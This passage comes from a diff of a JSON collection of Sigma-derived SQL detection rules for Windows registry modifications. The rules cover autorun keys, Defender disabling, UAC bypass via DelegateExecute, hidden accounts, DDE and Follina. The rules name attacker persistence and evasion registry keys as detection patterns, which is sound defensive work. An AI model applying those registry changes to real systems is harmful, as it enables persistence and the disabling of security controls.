'%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewValue = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "Enable Microsoft Dynamic Data Exchange", + "id": "63647769-326d-4dde-a419-b925cc0caf42", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1559.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_set_office_enable_dde.yml" }, { - "title": "Service Binary in Uncommon Folder", - "id": "277dc340-0540-42e7-8efb-5ff460045e07", - "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Sensitive Settings Changed to Zero", + "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", + "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_creation_service_uncommon_folder.yml" + "filename": "registry_set_terminal_server_suspicious.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential PendingFileRenameOperations Tamper", + "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Installers and updaters may set currently in use files for rename after a reboot." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\')))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_susp_pendingfilerenameoperations.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Registry Hide Function from User", + "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.002" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_set_hide_function_user.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "title": "Disable Internal Tools or Feature in Registry", + "id": "e2482f8d-3443-4237-b906-cc145d87a076", "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ], "falsepositives": [ - "Administrator actions" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_set_disable_function_user.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1221" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_set_cve_2022_30190_msdt_follina.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "status": "experimental", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "CurrentVersion NT Autorun Keys Modification", - "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "title": "Common Autorun Keys Modification", + "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", "status": "experimental", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "tags": [ "attack.persistence", "attack.t1547.001" @@ -31183,1374 +31154,1449 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR NewValue IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed 